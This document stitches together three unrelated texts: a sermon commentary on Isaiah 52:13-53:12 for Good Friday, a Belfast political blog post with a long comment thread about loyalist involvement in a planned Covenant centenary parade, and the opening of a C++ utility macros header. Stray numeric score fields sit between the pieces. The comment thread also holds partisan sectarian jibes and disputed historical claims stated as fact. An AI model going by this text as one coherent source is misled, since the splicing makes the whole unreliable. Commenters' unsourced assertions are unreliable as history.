Commentary on Isaiah 52:13-53:12 Preparing to preach on Good Friday is preparing to wander about in the heart of the mystery of God’s reconciling activity in Jesus Christ and (most importantly!) inviting your hearers and by extension the world into the all-important mystery of faith. Isaiah’s Servant Songs, of which this Good Friday text is the fourth and final, hold a particular place within the theology of the church. I do not mention this as a means of ranking texts one above or below another. Rather, I draw our attention to the place of these texts in the interpretation of the church because in and by these texts the early church understood who Jesus of Nazareth was and is. And, quite frankly, they remain guiding texts in how we continue to understand who Jesus of Nazareth was and is. Textual horizons There are many well-known textual, historical, and interpretive challenges in and around the Servant Songs of Deutero-Isaiah.1 These are heuristically important, but not central to the preaching task for Good Friday. Perhaps the primary interpretive task when thinking about this particular text in relation to Good Friday is hanging out in this fourth Servant Song with the conviction that it is Christian Scripture.2 Such a conviction does not negate that it is also Jewish Scripture. Interpretation is not a zero sum game. Isaiah, like the rest of the Old Testament / Hebrew Bible, is inherited by both Judaism and Christianity. That said, it is important to acknowledge and remember that we Christians have misused this (and many other!) texts in condemnation and persecution of Jews. At times during the history of the church, Good Friday has proved to be a particularly violent flashpoint for Christian persecution of Jews.3 It does the church no good to deny the anti-Jewish and even anti-Semitic misuse of Old Testament texts. It also does the church no good to condemn Isaiah for this misuse.4 In fact, turning directly into Isaiah may well be the route to take -- preaching Christ and him crucified, normed by Isaiah as Christian scripture without moving towards anti-Judaism. It is no wonder that early Christians heard the story of the crucifixion in the fourth Servant Song (Isaiah 52:13-53:12). “He shall be exalted and lifted up … ” (52:13) “ … his appearance was so marred, beyond human semblance … ” (52:14) “He was despised and rejected … ” (53:3) “ … like a lamb that is led to the slaughter, … he opened not his mouth (53:7) “And they made his grave with the wicked … ” (53:9) The parallels with the New Testament (NT) gospels’ stories of the crucifixion of Jesus are significant.5 Yet, rather than making this a matching game between Isaiah and the NT gospels, consider turning your homiletical gaze toward the theological claims that the Servant Song makes. If we as Christian interpreters allow that this Good Friday pericope “lives” within the horizon of God’s reconciliation of the cosmos to God’s self in the crucifixion of the incarnate Word, we have a place to start. So, how does this text nudge us to think about the significance of the Servant’s suffering? Repeatedly the song speaks of the Servant taking on griefs and sorrows (Isaiah 53:4), iniquities (53:6, 53:11), and sins (53:12), for the benefit of the hearer. As Luther says of Isaiah 53:4, “These words, OUR, US, FOR US, must be written in letters of gold.”6 The Servant is not suffering for the sake of suffering. The Servant’s suffering and death, which is also the judgment of God (53:10), is the revelation of God’s mercy. In our stead, Christ bore our sins.7 Preaching horizon On Good Friday, consider wandering boldly into the mysteries of God. Jesus Christ has taken on the sins of the world. “… the Lord has laid on him the iniquity of us all.” (Isaiah 53:6) As a result, we are no longer defined by our sin, our iniquities, our sorrows, our transgressions. All are defined by Christ’s death. When you look in the mirror, when you look at a family member, when you look at a friend, when you look at a stranger, when you look at an opponent, when you look at an enemy, their sin does not define. God’s mercy revealed in the ugliness of Christ’s crucifixion defines us all. Christ bears your iniquities and gives you his righteousness. Good Friday and in particular Isaiah’s song leaves no room for self-righteousness. Rather we are drawn more deeply into the mystery of faith. Notes: 1 The interested are invited to explore Klaus Baltzer’s masterful survey of research and exegesis of the Servant, c.f. Deutero-Isaiah (Hermeneia; Minneapolis: Fortress, 2001) 19-24, passim. 2 Consider chewing on Brevard Child’s The Struggle to Understand Isaiah as Christian Scripture (Grand Rapids: Eerdmans, 2004), a survey of place of Isaiah in the history of the Church’s biblical interpretation. 3 Between the gospel readings which may include Matthew 27:25, wherein the crowd shouts, “His blood be on us and our children!” (RSV), and the Good Friday prayer calling for the conversion of the “perfidious Jews,” Christians were known to take the occasion to be an open door to violence against Jews. Cf. Heiko Oberman, The Roots of Anti-Semitism (James I. Porter, trans.; Philadelphia: Fortress, 1984) 28. 4 Cf. John F.A. Sawyer, The Fifth Gospel: Isaiah in the History of Christianity (Cambridge: Cambridge University Press, 1996) 100-125. 5 In addition to the 50+ references and allusions to Isaiah in Revelation, Sawyer’s visual of the prominence of Isaiah in the NT Gospels, Acts and Letters is striking, 26-28. 6 LW 17.221. Recall also the Nicene-Constantinopolitan Creed: For our sake he was crucified under Pontius Pilate. | Mid | [
0.591647331786542,
31.875,
22
] |
The Future of Loyalism session at the Political Studies Association conference started with two academics – Jim McAuley and Graham Spencer – introducing the Political Studies Association delegates to loyalism, loyalist themes and transformation efforts so far. Rev Chris Hudson – who acted as a conduit between the Irish Government and the UVF – spoke about his journey. [Click on their names to hear their 10 minute introductions.] Finally, Jackie McDonald – introduced as a former UDA prisoner – spoke about his own experience of loyalism. He talked about experiences on his estate before the UDA was formed (when white collar workers met and sought to limit any increase in Catholic occupancy of their area), gave his view on Gary McMichael’s strategy and drugs entering the organisation. (It was hard at times while listening not to sceptically wonder how far his revisionist dial was cranked up and contemplate which inconvenient facts were being overlooked or vastly simplified.) In the Q&A session the opening remarks, Jackie McDonald was asked about the Orange Order. You can hear his five minute reply. But in the second half he questioned aspects of the Orange Order Belfast District’s plans for a ‘Covenant parade’ in May. On the 19th of May – I’m not sure if everybody would be aware – the Grand Lodge is going to have (to celebrate the centenary of the Covenant which is going to be on the 28th or 29th of September) but they’re making that their baby, their thing, so the Belfast District are having one [a parade] on the 19th of May which is going to go to Ormeau Park. But they’re allowing loyalism to join in. There could be 35-55,000 people walking. There will be thousands of people lining the route. There will be thousands of people in Ormeau Park to welcome them there. The problem we have is … the Orange and the bands will take the first part of the parade, and then it will be the UVF in the Somme gear – the Somme associations and what they’re telling us is they’ll have the uniforms, they’ll have the antique motors with the machine guns on them and all the paramilitary flags – and the UDA will be suited and booted, the Ulster Defence Union will be wearing their green blazers and what have you. If you’re a nationalist – and this parade passes parts of Short Strand or wherever – how are you going to feel? Are you going to feel threatened? Is that going to be a positive thing or a negative thing? And I’d very wary that as part of the peace process we should all be moving forward and we should be taking into consideration how the nationalists feel. But the Orange Order are saying “that’s not our problem, that’s the police problem”. People belonging to us have asked them what happens if the dissidents attack the parade? “That’s not our problem. That’s the problem for the police.” What happens if some of the local blue bag brigade joins in and causes problems? “Oh that’s not our problem. That’s the PSNI problem.” But it’s not. It’s their problem. It’s their parade and they’re responsible for the behaviour of the people in it. He finished the answer with the statement: I support the Orange, but I don’t want anything to do with them if you know what I mean. It’s positive that Jackie is publicly thinking first through the eyes of others. It puts his rhetoric in the same league as Peter Robinson and Martin McGuinness who frequently now make statements that are deliberately inclusive and question their own community’s reaction to their neighbours. While the relationship between Jackie, the UDA and the Orange Order is no doubt much more complicated and baggage-laden than he expressed yesterday, his observations do raise questions about the institution’s plans to commemorate the signing of the Ulster Covenant. Related About Alan Meban (Alan in Belfast) Alan Meban. Normally to be found blogging over at Alan in Belfast where you'll find an irregular set of postings, weaving an intricate pattern around a diverse set of subjects. Comment on cinema, books, technology and the occasional rant about life. On Slugger, the posts will mainly be about political events and processes. Tweets as @alaninbelfast. This from McDonald is encouraging at least. I think we’d wait a very long time before hearing these concerns expressed by Robinson as he still supports the coattrailing of orangemen through the contentious areas in spite of his claims to be reaching out. It’s all empty gestures with Robbo. keano10 This sort of provaction has been going for years as Orange Pardades have passed Short Strand so it’s nothing new to be honest. McDonald’s words are encoraging but nobody is going to listen to him. They simply enjoy it too much. They enjoy the provocation. Full stop. Anyone who has ever stood outside my local church, St Matthews Chapel, as they deliberately halt their Orange parade, play the Sash and dance all over the roads, will be aware of this. (Often is spite of Parades Commision Rulings not to do so). Institutionalised Unionism in the form of The Orange Order specifically was always going to be the hardest and most difficult starnd to change. Simply because they dont want to… keano10 ** strand to change *** andnowwhat Maj, you’re fotgetting that Jackie has a new Irish president to break in. I’m Joking BTW. Fair play to Jackie because it won’t be the first minister, the one who is doing all the supposed taig love, who is going to say to the Orange, now lads. Essentially there is a choice between Historical Accuracy and the Common Good (Community Cohesion). The nature of the upcoming commemorations is that they appeal to one side or the other. But not both. In a very real sense, the re-enactment (and interestingly re-enacting is a comparatively new feature) of events which were controversial, possibly provocative and possibly threatening cannot be depicted without re-enacting controversy, provocation and even threat. In that sense it is historically accurate. The alternative, is a semi-official sanitised version, all “outreach” and “inclusive” but hardly accurate. Re-enactment…..or as some would have it “dressing up” is an interesting comparatively new development (not counting the Sham Fight people). Whether it is Sealed Knot Cavaliers and Roundheads, Scottish Highlanders at Culloden or the (claimed) one million Americans who spend their summer weekends “in civil war camp” or the Waffen SS guys………I dont think it is possible to dress up and carry props without in some way taking on the belief systems of those who originally wore the uniforms and carried the props. Re-enactment …..and surely it will give licence for more dressing up and prop carrying at Easter 2016….is therefore more likely that people will be strengthened in their different beliefs rather than break them down. And it wont be possible to detach the events from the 1960s and early 1970s from these events. It will therefore turn out to be a nightmare for those who talk of “shared history”. Reporting the Titanic 2012 thing (and I have issues with that) was comparatively easy. It is arguably the “softest” centenary. But the reporting of the Covenant events will be interesting. Silly of me, Kal to forget that. By the way what happened to the wall to wall coverage on BBC and utv of the titanic exploitation? the backlash has started I think. Back on topic, the election threat over the prison officer’s insignia reveals the freudian slip by Robinson. The mask was soon back in place. Drumlins Rock Alan, I and hundreds of others have paraded through Belfast and many other towns in a reproduction military uniform, with reproduction weapons, both handheld and mounted, marching in ranks and taking instruction from a commanding officer, however all of which were glorified fancy dress based on the late 17th C, so I doubt any offense was ever caused. If sometihng similar is the intentions on the 19th of May, I will probably attend and take part, but I want no part if it is a thinly disguised glorification of the so-called loyalist paramilataries, and would hope any decent Orangeman would feel the same. FJH. Clearly for the unionist establishment and media here the hardest 1912 centenary to mention is the forced eviction of thousands of catholics from the shipyard which is now being so lovingly embraced in prinrt and broadcast. That’s one exodus gregory won’t want to hear about as he’s very selective about this. Blue Hammer Celebration of the UVF is fine. So long as the UVF in question is the original version from 1913-16. That bunch of yahoos who missappropriated that honourable name and emblems in 1966 to date are worthy of nothing more than scorn and a cell in gaol. I know little of this planned event, but it is clearly indefensible to march a group of paramilitaries past the scene of some of their worst crimes. salgado Blue Hammer – even a commemoration of the original UVF could be pretty intimidating. I don’t think people in Short Strand will really care which era is marching past, either way it’s pretty tactless. DC Can they not organise these events for Carrick instead of divided parts of Belfast? Blue Hammer Salgado I take that point. I have no interest in any marching, but just thought that a historically themed parade of guys in WW1 gear on antique vehicles is surely less incendiary than one with participants who tended to operate in jeans, leathers jackets and balaclavas. Mike the First Sickening and disgraceful if the modern day UVF and UDA terrorists (even in their “UDU” incarnation) are being included in this. salgado True, it should be less incendiary, but commemorating armed loyalist groups (even antiquated ones) near areas that have been terrorized by their descendants (whether the name is misappropriated or not) is still tactless. Tochais Síoraí Maybe the same characters can continue their commemorations and do a recreation of the Battle of the Somme for us (with live ammo) in 2016. Blue Hammer Tochais Meanwhile we can round up a few republican leaders from a Post Office ( we can schedule it for giro day!) and execute them by firing squad. All in the interests of mutual respect for commemorations and re-enactments of 1916 events of course. cars1912 Well he got part of it right but a good bit of it wrong. Never let the truth get in the way of half truths. Glad to see that you all have accepted what he has said as the truth. There will be no guns for starters but what the hell if Jackie says there will be who am I to challenge him. Yes it will walk up the Newtownards Road which the last time I looked was a road populated by Unionsts. Sure Short Strand will hear and if they go out of their way see the parade. As for the numbers quoted by Jackie I suppose we will have to take them as gospel to. Dream on. CoisteBodhar So they’ll be going up the Ormeau Past the bookies or making some kind of detour? Ardmajel55, As one of the nine galleries in the Titanic Exhibition Centre allows visitors to experience life as a shipyard worker in early 20th century Belfast, I would assume that for historical accuracy there is some interactive “Belfast Shipyard Confetti” to allow Catholic visitors to get the fully authentic experience. But as other contributors have stated there is a backlash against the “soft” approach taken by the media when dealing with people from the Titanic Experience, Arlene Foster, City Council, Norn Iron Tourism. I went along to the site on Saturday and franly the young folks from the Free Presbyterian Church were the only people who really “got” the Titanic. I have seen (elsewhere in Belfast) a souvenir of a little statuette…..a child in dressing gown and life jacket clutching a teddy bear and suitcase which isI think tacky. Only a few years ago I pointed out to an incredulous manager at the Welcome Centre that the Titanic ashtrays were inscribed “BARLAND” rather than “Harland”. There is actually a genuine debate to be had as to whether the media should be part of the “official” project of the Decade or whether it should be detached. Does the media have a “duty” to consider the bigger picture of community cohesion or be detached and impartial? My impression from last weekend that the media was just a little too enthused. In cases of civil unrest, war (including the Troubles themselves) this was an issue between government and (particuarly public service) broadcasters. In fairness, it is probably a grey area, in the case of a full scale war, the national media probably has a duty to be little more than an arm of government. At a seminar in the Ulster Museum in March 2011, the Arts Community rejected they had to paint or write for the “public good”. It is basically dishonest. But I cant see how that really fits into the upcoming Decade. I just think each community should be “allowed” to get on with their own celebrations/commemorations. andnowwhat Why is the event in Ormeau Park, within the earshot of lower Oremau residents. We all know the issue there with the bookies and marchers doing the finger taunt some years ago. Personally, I find that more offensive than the Short Strand issue. Reader ardmajel55: Clearly for the unionist establishment and media here the hardest 1912 centenary to mention is the forced eviction of thousands of catholics from the shipyard which is now being so lovingly embraced in prinrt and broadcast. That would be 1920, I think. A busy year. Reader. Ok, that’s corrected, thanks. I’d only recently discovered this story and thought I read it was 1912, I believe there was a big riot in derry in july that year afortnight in fact after my late father was born. Serious period in history in ireland FJH. The news editors at ormeau and havelock house lost ther run of themselves completely and only noel thompson made a valiant effort to balance things last fridday in what was otherwise a newsline edition which went completely ape. Their facebook page shows their irritation at the less than grateful public’s reaction. The gin and titonic promo showed the complete lack of commonsense or judgement by the organisers. Drumlins Rock for goodness sake, now its “within earshot” MOPE MOPE MOPE MOPE MOPE andnowwhat Not really moping DR. Don’t forget that it was Orangemen who put the final nail in the coffin of the Ormeau marches. Now, that we protest they do at the bridge and the bi weekly one they do at Garvaghy, that’s some serious MOPE MOPE MOPE. How many years have they been doing that crap for? DC Mind you, if the band plays this tune below there will be many a nationalist unsure of what to do: FJH 1[.47] Sorry, I didn’t get much time earlier to go through all of what is a substantial post, FJH. I haven’t yet been to Belfast adn have only seen the outside on TV etc. The frontage which dwarfs the ground floor entrance is totally out of proprtion and looks a bit like an outsize wardrobe apparently about to take flight. There’s little dignity in that, frankly. Only slightly less ridiculous looking than the giant fake jelly on the truck reggie perrin was driving in the original series. Comrade Stalin If a former UDA prisoner thinks the thing is over the top then it is hard to dismiss all this as nationalist mopery. Given that the Orange Order apparently still can’t demonstrate any of the responsibility associated with its role as a principal parade organizer, here’s hoping that the Parades Commission place heavy restrictions on any of this provocative nonsense. andnowwhat Comrade Stalin Maybe Jackie has sussed the bleeding obvious; that such behaviour keeps the spirit of division alive. Suits me fine for my agenda. lamhdearg2 Thou shall not march within earshot of a irish nat, this is the rule the fascists will push, i seen this coming, and have mentioned it before, expect resistance to this rule. andnowwhat Now, you know full well the issues with the Orange, the lower Ormeau, Orange men holding up fingers re. the amount of people shot in Graham’s bookies. Before anyone comes off with the usual toss about it being bandsmen, there’s a nice clear photo of an orangeman in his collatrette doing the finger thing on the net. Actually, there’s about 5t sources for it cars1912 Jackie McDonald does not speak for anyone other than himself in this tape. He is entitled to dislike the OO for whatever reason. I don’t care what he thinks or says. The parade is not going up the Ormeau Road end of. The routes of the parade have been on the world wide web for some time if people tried to look for them. Deirdre Hargey take note. Yes people on the Ormeau Road may hear bands but so what. There will be no guns, no paramilitary flags and there won’t be 50,000 in the parade. McDonald needs to listen to the loyalist community and what they are planning. If he did he wouldn’t talk bull. The organisers have scheduled talks with the residents of SS. This has been planned for a while now. Not sure what the residents of the Lower Ormeau would want to talk about. Oh yes we can hear your dreadful music now clear off. Mind you the organisers could have given you something to really gurn about and opted to walk along the Alberbridge Road. Guess what they won’t. For the record the Council deem Ormeau Park as shared space. I guess that means we can use it to. SF have been aware of the parade and that there are no feeder parades since the late Autumn. carl marks Can anyone answer these questions? 1/ will there be homage to the “old uvf. 2/ will the present day uvf and uda be marching in the parade. 3/will the parade be marching past a nationalist area. If the answer to all these is no, then knock yourselves out boys. If the answer to either 1&2 are yes then I would ask the PUL posters to remember the anger they felt when a group on nationalist youngsters were dressed up as provos in Crossmaglen and firmly condemn the march, this should happen no matter where the parade is being held, after all the kids in Crossmaglen where nowhere near a unionist or loyalist area and unionists were still offended. Failure to come out against paramilitary involvement will once and for all expose the hypocrisy of unionism when they give off about nationalists and their support of terrorism. IF 3 is right then proper consultation with the community in question is to be expected. Mick Fealty Hear what you sat Carl… But do expect that will take us through all commemorations in the next decade? carl marks No Mike i dont, each one will present its own problems. each one will require its own solutions, thats if there are solutions. carl marks FJH may well be right, some things in this place cant be shared. andnowwhat Carl Marks Wise up. Why wouldn’t nationalists not which to support the celebration of a document that swore signaotries to ” (use) all means which may be found necessary to defeat the present conspiracy to set up a Home Rule Parliament in Ireland” Can’t see a single thing for us nationalists to object to at all. Now, I’m off to stick a size 10 knitting needle in my fenian eye for God and Ulster carl marks andnowwhat Im sorry could you tell me wtf you are talking about. cars1912 1/ will there be homage to the “old uvf.- no 2/ will the present day uvf and uda be marching in the parade – as far as I know yes. 3/will the parade be marching past a nationalist area – its walking up the Newtownards Road and the residents are welcoming the parade. Short Strand is in the locality. As already stated there are scheduled talks arranged with SS. Period costume will be that of the Ulster Clubs of 1912. Same as the people we see at all the Titanic stuff. No guns. I see no reason why the UDA and UVF cannot be involved. After all we have Provos running the country and many other aspects of our life and guess what I don’t complain. carl marks cars1912 I see no reason why the UDA and UVF cannot be involved. After all we have Provos running the country and many other aspects of our life and guess what I don’t complain. You honestly don’t see a problem with terror groups parading and pretending to be some sort of heroes. You honestly don’t see why nationalists (and a lot of unionists) will have a problem with this. You honestly don’t see the hypocrisy of complaining about nationalist links with the provos then marching with loyalist terror groups. I think you got to the knitting needle before andnowwhat Comrade Stalin andnowwhat Can’t see a single thing for us nationalists to object to at all. Now, I’m off to stick a size 10 knitting needle in my fenian eye for God and Ulster I don’t see how we can sit here shortly after the Queen laid a wreath at the Garden of Remembrance in Dublin and talk about how unreasonable it is for unionists to want to commemorate the convenant. Suddenly it’s nationalists who are yelling “no” down a megaphone. To me, the convenant and the Irish war of independence are two sides of a rather dark and bloody coin, personally I’m not interested in either of them. But there are plenty of people who feel they are important, so provided the celebrations are lawful and respectable I can see no reasonable grounds for objection. Back on the subject of Jackie McDonald’s comments here, having considered it a bit more I’m wondering if there is any kind of UVF/UDA rivalry going on here. USA What on earth are the Orange Order doing inviting the modern UDA and UVF to participate in one of their parades? Harry Flashman FJH I think Kevin Myers debunked a lot of the nonsense about the shipyard and the Titanic in a recent article, pointing out that H&W’s owner was an avowed home ruler who shut the yard down in protest at attempts to intimidate Catholic workers. Drumlins Rock CS, It is difficult to take Jackie at face value considering his history. USA, maybe the OO is trying to curtail the UVF & UDA organising their own parades? which wouln’t be good you will agree, lesser of two evils? just a guess. Comrade Stalin I think Kevin Myers debunked a lot of the nonsense about the shipyard ROTFL Harry Flashman Sorry CS, I forgot the pavlovian reaction among some people to the name Kevin Myers. But my assertion remains, he did point out that H&W was not a unionist bastion in 1912, that’s a historical fact no matter how much the red mist descends at the mention of the man who states it. Oh and the hull’s registration number didn’t reflect as “No Pope” [3909 ON] another cherished myth. Comrade Stalin Sorry CS, I forgot the pavlovian reaction among some people to the name Kevin Myers. I’ve seen articles written by Myers that were factually incorrect. Not just slightly inaccurate, but completely wrong. He can’t be trusted as a source. he did point out that H&W was not a unionist bastion in 1912, that’s a historical fact I’d like to see exactly what the sources are for that “historical fact”. The rampant discrimination and inequality here didn’t happen overnight during December 1922. Oh and the hull’s registration number didn’t reflect as “No Pope” [3909 ON] another cherished myth. That particular myth is pretty easy to debunk by noting that there are plenty of clear photographs and drawings of the Titanic, and none of them show this fabled registration number anywhere. Harry Flashman ” I’d like to see exactly what the sources are for that “historical fact”.” “In fact, until the disastrous decision to give home rule to Northern Ireland, the workforce of the shipyard was pretty much divided on demographic lines. And far from the company being “unionist”, its chairman, William Pirrie, was a keen Home Ruler who acted as Winston Churchill’s host during a nationalist rally in Belfast; and for this, he was roundly hissed by unionists in the streets. Moreover, he shut the yard down when there was an attempt to eject Catholics, and warned it would remain closed until guarantees were given about the safety of the Catholic workforce. ” But Kevin Myers said it so we must ignore it, isn’t that how it works? carl marks D.R. I’m sorry that doesn’t do it for me. If what we have heard about this march is true, ( by the way I’m finding it hard to believe that the OO is this stupid) there is no excuse and to be honest the lesser of two evils thing sounds like clutching at straws to me. Comrade Stalin Harry, As I said, I take all claims from Myers that are unsourced with a huge pinch of salt. A suggestion that a lockout occurred at some point in 1912 does not, and cannot, debunk the documented reality that the shipyard in common with the rest of Belfast’s manufacturing industry didn’t employ Catholics almost as a rule. There were exceptions to that rule (Martin McGuinness commented that he had a relative in the shipyards), but they were just that – exceptions. (and what became of that lockout – did it go ahead ? How long was production at the shipyard stopped for ? What guarantees were received in exchange for lifting the lockout and who underwrote them? Did the other directors at H&W agree to all of this ?) This sort of revisionism is typical of Myers’ myopic contrarianism. Moreover, it seeks to deny the family history of many of us here. It was extremely difficult for Catholics to obtain employment here and this problem didn’t begin to be properly addressed until the late 1960s. HF You forgot conveniently to say this was before Partition so youre using a pre partition situation to cover the rest of H&W’s’ tenure. nice work but it doesn’t cut it. Harry Flashman “HF You forgot conveniently to say this was before Partition so youre using a pre partition situation to cover the rest of H&W’s’ tenure. nice work but it doesn’t cut it.” Cut what? I was referring to FJH’s assertion that in 1912 H&W was a loyalist bastion, I am pointing out that on the contrary the owner was a Home Ruler, the rest of your post is frankly unintelligible. CS Myers states that the ratio in 1912 was “demographic” by which I assume proportional to the local population, East Belfast would have been massively protestant at that time if I am not mistaken. The worst anti-Catholic purges in H&W occurred from 1920 onwards when former workers returning from the War claimed that all their jobs had been taken by “disloyal” workers, ie Catholics. Seems that H&W as an employer didn’t have a particular objection to hiring Catholics in large numbers, even if their staff did. You’ll have to back up your previous assertion that Myers has made many completely false historical statements with examples if you want to get into a discussion on his factual reliability. As I recall back about ten or fifteen years ago he admitted that one of his previous posts on the 1919-21 war was based on misinformation and he withdrew it, beyond that I’m sure you will come up with a host of inaccuracies. Comrade Stalin Myers states that the ratio in 1912 was “demographic” Everything that Myers “states” is subject to suspicion. As I’ve said three times now. by which I assume proportional to the local population, East Belfast would have been massively protestant at that time if I am not mistaken. The demographics of the local population isn’t the issue. Places like Mackies and the Gallagher tobacco factory in N Belfast were situated in areas with a lot of Catholics nearby and yet they employed hardly any. Seems that H&W as an employer didn’t have a particular objection to hiring Catholics in large numbers, even if their staff did. Maybe, but I don’t see any evidence for this. Bearing in mind that the individual supposedly involved in the aforementioned lockout was one out of the three principals in the company. You’ll have to back up your previous assertion that Myers has made many completely false historical statements with examples if you want to get into a discussion on his factual reliability. I have to do no such thing. You can’t quote op-ed or opinion piece stuff as fact, without reference to the underlying sources. between the bridges Any comment to make about the UDA andUVF marching. or does that not matter. between the bridges carl i think the fact that the uda is not marching may have more to do with Brig jackie’s comments, which portray a somewhat differ event to the one which has the support of Belfast City Council, the Heritage Lottery Fund and the Community Relations Council… carl marks Now you say they aren’t marching but CARS1912 says they are. Jackie says they are. And you haven’t mentioned the UVF. So which is it if you have facts share them with us. between the bridges carl to the best of my limited knowledge neither the uda or the modern version of the uvf will be parading. the 1912 uvf will be commemorated/recreated, now i am sure we can debate the difference needlessly without agreement, but the fact is the 1912 uvf and the 36th ulster division have merged in PUL history/folklore, a fact that i am reminded of on my occasional attendance at my local cathedral. tacapall BTB so who will be recreating the old UVF, will it be the modern day UVF members or actual members of the Orange Order ? between the bridges T..i believe the organisers have encourage participants, where possible to parade in period costume… tacapall Participants ! So will they be Orange Order members or members of the public ? carl marks between the bridges. This is very important; it will be the first of a lot of this sort of thing coming up and will set the trend. Before i am misunderstood I don’t want 1916 to be turned into a paramilitary display, As to the old UVF being portrayed, I don’t like it but I see your point, but to march them past the Short Strand is insensitive to say the least as I’m sure you would find a old IRA display marching past the Shankill say. Indeed you don’t, but if you refuse to do so it rather renders utterly irrelevant your claim; “Everything that Myers “states” is subject to suspicion. As I’ve said three times now.” If you three times impugn a writer’s integrity the onus is on you to back your claims up, if you can not or will not do so the rest of us can safely dismiss your thrice-made claims as so much hot air. I suspect your original claim that you personally have on many occasions found inaccuracies in Myers work to be bunkum, if you like I will say that three times. cars1912 Comrade Stalin in reply: You honestly don’t see a problem with terror groups parading and pretending to be some sort of heroes. I think they have been parading for years. Who says they are parading as heroes. Parading to remember our forefathers? Yes. As heroes? No. So what’s the problem now? You honestly don’t see why nationalists (and a lot of unionists) will have a problem with this. Of course I see that many people have a problem with this. Doesn’t mean to say it cannot happen. I assume that all shades of IRA have been parading over the last couple of days. Do the same rules apply to them? You honestly don’t see the hypocrisy of complaining about nationalist links with the provos then marching with loyalist terror groups. I’m not complaining. Comrade Stalin cars1912, I have no idea what point you are trying to make. It might be more obvious if you didn’t make assumptions about my underlying motivations (which are almost certainly incorrect). hurdy gurdy man Comrade Stalin (& cars1912) Cars’ 6.15 is actually a response to Carl Marks’ 9.13 on the 6th April. He’s got the handles mixed up. andnowwhat I think it’s a measure of Myers to see the reaction on southern sites when he is quoted or linked. He, like Harris, is regarded as a complete joke. Whilst fine trades suffer, the contraversialist seems to be a thriving business. andnowwhat I meant “contrarian” Harry Flashman “He, like Harris, is regarded as a complete joke.” Odd then that the two of them are among the highest paid commentators in the Irish media. It would be more accurate to say that Myers and Harris are hated by a certain narrow section of Irish society for their courage in showing up the fascists in the Provisional movement for what they are. I can take a line through someone’s pavlovian reaction to Myers and Harris and can instantly judge the character of the critic and what his opinions will be about other issues. Cars. I apply the same rules to republican groups as I apply to loyalist groups. I Have been informed by BTB on his post of 7 April 2012 at 10:54 pm That the UVF and UDA are not going to march, I hope it is true ( he normally seems to be in the know about the OO) but answer me this if they do march what will be the order of march. Could I suggest that they march in teams perhaps first the drug dealers then the pimps and bringing up the rear perhaps having a collection the lads running the protection racket. Will the beast from the east take the salute, and wiil the Mount Vernon lads get a place of honour. Comrade Stalin Odd then that the two of them are among the highest paid commentators in the Irish media. That tells us nothing about the quality or veracity of Myers output. Only what we already know, which is that controversy and hyperbole sells. It would be more accurate to say that Myers and Harris are hated by a certain narrow section of Irish society for their courage in showing up the fascists in the Provisional movement for what they are. No, it’s because Myers opinions are offensive to reasonable people. They are decisive, hateful, negative and insulting; they are the thoughts of someone who clearly has some sort of deep seated self-loathing going on. The man is more than entitled to his opinions and the means by which to publish them, but this does not change the fact that they are opinions, and not fact. Talking about fascism, that article that Myers did a few years ago about Africa and how aiding it would only increase the problems of AIDS etc is the sort of thing that our locally grown Nazi organizations would have circulated among their supporters at length. PaddyReilly The structure of Kevin Myers’ “debunking” is very curious. He shows, or purports to show, that there was no discrimination against Catholics in the Shipyard in 1912. This is then taken as showing that stories told of a non-existent Catholic workforce there by Belfast Catholics of our acquaintance are “myths”. But one might legitimately ask, how many people that I or anyone else have spoken to, even decades ago, were talking about 1912? Why not take the argument one stage further, and assert that since everyone in Ireland in 1500 A.D. was Catholic, there has therefore never been any discrimination against Catholics, ever? impongo2 and republicans walking through various parts of belfast over easter warrants no comments from any of you or is it the usual one sided rhetoric from the usual suspects Harry Flashman Given that FJH, Myers and I all specifically referred to 1912 and the building of the Titanic I’m not entirely clear what your point is Paddy. Harry Flashman “our locally grown Nazi organizations would have circulated among their supporters at length.” Godwin strikes again, so saying that throwing eleventy gazillion, bazillion dollars of “aid” at Africa over the past half century might well have exacerbated rather than ameliorated the problems of that benighted continent makes one a Nazi now does it? Sheesh, hysterical much? Still haven’t pointed out the many factual errors that you have personally noticed in Myers’ writing I notice. I wonder if you were bluffing. PaddyReilly Kevin Myers wrote “Catholics cherish the myth that they weren’t allowed to work in the shipyards”. To show, or in fact merely to assert that they were allowed to in 1912 has no bearing on this. The period complained of was not 1912, but sometime in the lifetime of the complainant. Many abuses were brought in after 1922 which would not have been tolerated before that. The Orange Order was banned for a while in the early 19th Century, as contrary to good order. The reason for these abuses was the special requirements of the Orange state, whose continuation required that there be no demographic change, at least not in the direction that favours Catholics. Comrade opines that The rampant discrimination and inequality here didn’t happen overnight during December 1922. This I suppose is true, and the Pirrie story shows that there was already a movement afoot to eject Catholics, just that on this occasion it was not allowed to succeed. Myers continues “And of course, there is the myth that the Titanic was unique, when she wasn’t.” As far as I know, the story of the Titanic is that it was a ship, reputed to be unsinkable, which sank. Lots of people drowned. There’s nothing about it being unique. So Myers’ particular style consists in making things up, falsely attributing them to others, then refuting them and claiming that these are “myths” which he has “debunked”. Oh well, I suppose he has to write something. | Mid | [
0.6407322654462241,
35,
19.625
] |
// Copyright (c) Microsoft Corporation.
// Licensed under the MIT license.
#pragma once
#ifndef MSO_COMPILERADAPTERS_CPPMACROS_H
#define MSO_COMPILERADAPTERS_CPPMACROS_H
/**
Various low level macros that are globally useful
*/
/**
Broadly used macros
*/
#ifndef FImplies
#define FImplies(a, b) (!(a) || (b))
#endif
#ifndef FBiImplies
#define FBiImplies(a, b) (!(a) == !(b))
#endif
#ifndef RgC
#define RgC(ary) (ary), _countof(ary)
#endif
/**
Statement - used for control flow macros like Check, IfFailGo
Make the macro act like a statement.
*/
#ifndef __GNUC__
#define Statement(x) \
__pragma(warning(push)) __pragma(warning(disable : 4127 25037)) do { \
x; \
} \
while (0) \
__pragma(warning(pop))
#else
#define Statement(x) \
do { \
x; \
} while (0)
// error: there are no arguments to '__noop' that depend on a template parameter, so a declaration of '__noop' must be
// available [-fpermissive]
#define __noop()
#endif
// Prevent the compiler from automatically providing implementations of various
// class features. Use the macro in your class public: section.
#define MSO_NO_COPY_CTOR(type) type(const type &) = delete
#define MSO_NO_COPY_ASSIGNMENT(type) type &operator=(const type &) = delete
#define MSO_NO_DEFAULT_CTOR(type) type() = delete
#define MSO_NO_COPY_CTOR_AND_ASSIGNMENT(type) \
MSO_NO_COPY_CTOR(type); \
MSO_NO_COPY_ASSIGNMENT(type)
#if defined(__cplusplus)
#include <type_traits>
/**
When using an enum class to define a set of bitflags, normal bitflag
enum operations, such as |, ^, and &, don't work without lots of casts.
Use this macro to define |, ^, and & for your enum class, where |, ^ and ~
will return an enum class type, and & will evaluate to true or false.
